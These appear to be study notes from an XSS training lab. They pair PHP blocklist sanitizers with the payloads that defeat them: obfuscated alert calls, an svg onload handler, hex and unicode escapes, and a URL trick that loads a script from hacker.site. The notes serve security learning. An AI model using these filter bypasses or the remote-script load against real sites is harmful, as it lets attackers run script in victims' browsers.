# xss-iframe

XSS-IFRAME Tools

&#x20;<--invisible iframe

`xsser --gtk` — this will launch a nice GUI

## Examples from the lab:

alert('l33t')

\&gt;alert(\&apos;l33t\&apos;)

\<svg/onload=alert('l33t')>

alert('l33t')

alert('l33t')

\u0061lert('l33t')

eval('\x61lert(\\'l33t\\')')

\[NL]eval('\x61lert(\\'l33t\\')'

\[\u2028]eval('\x61lert(\\'l33t\\')'

eval(8680439..toString(30))(983801..toString(36))

<http://11.xss.labs%2f@hacker.site/x.js>

## Examples from the lab, accompanied by the code/filter presented in the lab

Each filter below is a blocklist (strip or replace known-bad patterns), and the payload that follows it is the bypass the lab demonstrates; the defensive takeaway is that pattern-stripping is not a fix and context-aware output encoding is. Several regex patterns render empty here (e.g. `'##is'`) because the HTML tags inside them were stripped when the notes were converted.

function Sanitizer($search){ // Let's start...
return 'Your search "**' . $search . '**" did not match any products'; }

alert('l33t')

function Sanitizer($search){ //To script, or not script..
$search = preg_replace('##is', NOSCRIPT, $search);

return 'Your search "**' + $search + '**" did not match any products'; }

\&gt;alert(\&apos;l33t\&apos;)

function Sanitizer($search){ //To script, or not script... this is no more the problem
$search = preg_replace('##is', NOSCRIPT, $search);

return 'Your search "**' + $search + '**" did not match any products'; }

\<svg/onload=alert('l33t')>

function Sanitizer($search){ //Script must be closed, here's a stronger filter... isn't it?
$search = preg_replace('#(.*?)</script(.*)?>#is', NOSCRIPT, $search); //No ON no party!
$search = preg_replace('#(on\w+\s*=)#s', NOEVENTS, $search);

return 'Your search "**' + $search + '**" did not match any products'; }

alert('l33t')

function Sanitizer($search){ //No ON no party!
$search = preg_replace('#(on\w+\s*=)#s', NOEVENTS, $search); //No Functions no party!
$search = preg_replace('#[()]#s', NOFUNCTIONS, $search);

return 'Your search "**' + $search + '**" did not match any products'; }

alert('l33t')

function Sanitizer($search){ //No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);

return 'Your search "**' + $search + '**" did not match any products'; }

\u0061lert('l33t')

function Sanitizer($search){ // No Unicode escaping.. there are a lot of smart guys out of there...
// Thanks to stackoverflow.com > <http://bit.ly/SO_decode_unicode>
$search = preg_replace_callback('/\\\u([0-9a-fA-F]{4})/', function ($m) { return mb_convert_encoding(pack('H*', $m[1]), 'UTF-8', 'UCS-2BE'); }, $search);

//No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);

return 'Your search "**' + $search + '**" did not match any products'; }

eval('\x61lert(\\'l33t\\')')

function Sanitizer($search){ // Breaking bad...

//No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);

return <<  //console.debug( $search );  RESULT; }

\[NL]eval('\x61lert(\\'l33t\\')'

function Sanitizer($search){ // Breaking bad... stronger
$search = preg_replace('#[\n\r]#', "", $search);

//No alert no party!
$search = preg_replace('#alert#is', NOALERT, $search);

return <<  //console.debug( $search );  RESULT; }

\[\u2028]eval('\x61lert(\\'l33t\\')'

function Sanitizer($search){ // No more string ...
$search = preg_replace('#[\\'"+]#', "", $search); // ... no more alert ...
$search = preg_replace('#alert#is', NOALERT, $search); // ... no no more alternative ways!
$search = preg_replace('#.source#is', "", $search);
$search = preg_replace('#.fromCharCode#is', "", $search);

return 'Your search "**' + $search + '**" did not match any products'; }

eval(8680439..toString(30))(983801..toString(36))

function Sanitizer($search){ // No scripts from untrusted origins or you'll see a nice gorilla
preg_match('#^(?:https?:)?\\/\\/11.xss.labs\\/#is', urldecode($search), $matches);
if(empty($matches)) $search = "...untrusted...";

// don't break the src tag
$search = preg_replace('#"#', "", $search); // ehehe and now? Are you still a ninja?
$search = strtoupper($search); }

<http://11.xss.labs%2f@hacker.site/x.js>
